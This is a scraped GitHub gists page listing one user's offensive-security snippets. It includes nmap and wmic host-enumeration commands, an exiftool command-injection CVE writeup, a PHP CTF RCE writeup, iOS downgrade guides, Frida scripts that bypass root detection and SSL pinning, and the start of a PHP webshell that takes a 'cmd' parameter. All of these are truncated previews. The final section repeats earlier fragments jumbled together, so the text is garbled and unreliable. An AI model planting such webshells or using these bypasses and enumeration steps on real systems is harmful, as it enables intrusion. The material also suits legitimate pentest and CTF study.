Marcos Tolosa marcostolosa

## extractPorts.sh
# Used:
# nmap -p- --open -T5 -v -n ip -oG allPorts

# Extract nmap information
# Run as:
# extractPorts allPorts
function extractPorts(){
	ports="$(cat $1 | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',')"
	ip_address="$(cat $1 | grep -oP '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}' | sort -u | head -n 1)"
	echo -e "\n[*] Extracting information...\n" > extractPorts.tmp

## wmic_cmds.txt
Host Enumeration:

--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)

wmic computersystem LIST full

--- Anti-Virus ---

wmic /namespace:\\root\securitycenter2 path antivirusproduct

## CVE-2022-23935.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                marcostolosa
                / CVE-2022-23935.md
            
            
              Created
              March 31, 2023 21:54
                — forked from lothan/CVE-2022-23935.md
            
              
                Command Injection in Exiftool before 12.38
              
          
    Overview

Exiftool versions < 12.38 are vulnerable to Command Injection through a crafted filename. If the filename passed to exiftool ends with a pipe character | and exists on the filesystem, then the file will be treated as a pipe and executed as an OS command.
Description

Exiftool is a "a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files." One of its features is being able to read metadata of compressed images. The code for this is GetImageInfo in exiftool:
sub GetImageInfo($$)


## writeup.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                marcostolosa
                / writeup.md
            
            
              Created
              October 20, 2022 12:34
                — forked from loknop/writeup.md
            
              
                Solving "includer's revenge" from hxp ctf 2021 without controlling any files
              
          
    Solving "includer's revenge" from hxp ctf 2021 without controlling any files

The challenge

The challenge was to achieve RCE with this file:
<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');
Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).
I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.

  
## web-servers.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                marcostolosa
                / web-servers.md
            
            
              Created
              September 21, 2022 15:25
                — forked from willurd/web-servers.md
            
              
                Big list of http static server one-liners
              
          
    Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
Discussion on reddit.
Python 2.x

$ python -m SimpleHTTPServer 8000

  
## FuturerestoreGuide.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                marcostolosa
                / FuturerestoreGuide.md
            
            
              Created
              July 27, 2022 14:17
                — forked from TheRealKeto/FuturerestoreGuide.md
            
              
                A guide fully covering the process of using Futurerestore to upgrade, downgrade, or re-restore to an unsigned iOS firmware.
              
          
    Futurerestore Guide

Futurerestore is a tool that allows users to upgrade, downgrade, or re-restore their iOS device to an unsigned firmware through the use of SHSH2 blobs. This guide will teach you how to use Futurerestore in order to upgrade, downgrade, or re-restore to an unsigned firmware.
Before continuing, keep in mind that this guide is based off of this one, and contains information that can change your device's behavior or even damage it. With that in mind, please read the guide fully, as no one but YOU will be held responsible for any damage caused to your device.
Notes and Hints

Throughout the entirety of this guide, keep in mind that:

iOS 13.1.3's SEP and Baseband are NOT compatible with iOS 12.x for all devices. This means that you're NOT able to upgrade, downgrade, or re-restore A10-A12X devices back to iOS 12.x. Attempting to use an incompatible SEP and Baseband will cause Futureresto


## ios_15_downgrade.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                marcostolosa
                / ios_15_downgrade.md
            
            
              Created
              July 27, 2022 14:04
                — forked from 0xallie/checkm8_downgrade.md
            
              
                How to downgrade from iOS 15
              
          
Important: Please don't use the comment section to ask for help. Join r/jailbreak (#genius-bar) or FDR Bureau (#futurerestore-support) instead.

How to downgrade from iOS 15

This is a guide for downgrading (or upgrading) to unsigned versions with futurerestore on checkm8 devices (A11 and below). You must have blobs for the version you want to go to, and SEP/BB compatibility may limit how far you can go.
Current SEP compatibility

The latest SEP/BB as of right now is iOS 15.4.1.

  
## root_bypass.js
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
//  - I added extra whitelisted items to deal with the latest versions
// 						of RootBeer/Cordova iRoot as of August 6, 2019
//  - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {

    var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",

## easy-simple-php-webshell.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {

## frida-android-repinning.js
/*
   Android SSL Re-pinning frida script v0.2 030417-pier

   $ adb push burpca-cert-der.crt /data/local/tmp/cert-der.crt
   $ frida -U -f it.app.mobile -l frida-android-repinning.js --no-pause

   https://techblog.mediaservice.net/2017/07/universal-android-ssl-pinning-bypass-with-frida/
*/

setTimeout(function(){
	# Used:
	# nmap -p- --open -T5 -v -n ip -oG allPorts

	# Extract nmap information
	# Run as:
	# extractPorts allPorts
	function extractPorts(){
	ports="$(cat $1 \| grep -oP '\d{1,5}/open' \| awk '{print $1}' FS='/' \| xargs \| tr ' ' ',')"
	ip_address="$(cat $1 \| grep -oP '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}' \| sort -u \| head -n 1)"
	echo -e "\n[*] Extracting information...\n" > extractPorts.tmp
	Host Enumeration:

	--- OS Specifics ---
	wmic os LIST Full (* To obtain the OS Name, use the "caption" property)

	wmic computersystem LIST full

	--- Anti-Virus ---

	wmic /namespace:\\root\securitycenter2 path antivirusproduct
	// $ frida -l antiroot.js -U -f com.example.app --no-pause
	// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
	// - I added extra whitelisted items to deal with the latest versions
	// of RootBeer/Cordova iRoot as of August 6, 2019
	// - The original one just fucked up (kill itself) if Magisk is installed lol
	// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
	// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
	Java.perform(function() {

	var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
	<html>
	<body>
	<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
	<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
	<input type="SUBMIT" value="Execute">
	</form>
	<pre>
	<?php
	if(isset($_GET['cmd']))
	{
	/*
	Android SSL Re-pinning frida script v0.2 030417-pier

	$ adb push burpca-cert-der.crt /data/local/tmp/cert-der.crt
	$ frida -U -f it.app.mobile -l frida-android-repinning.js --no-pause

	https://techblog.mediaservice.net/2017/07/universal-android-ssl-pinning-bypass-with-frida/
	*/

	setTimeout(function(){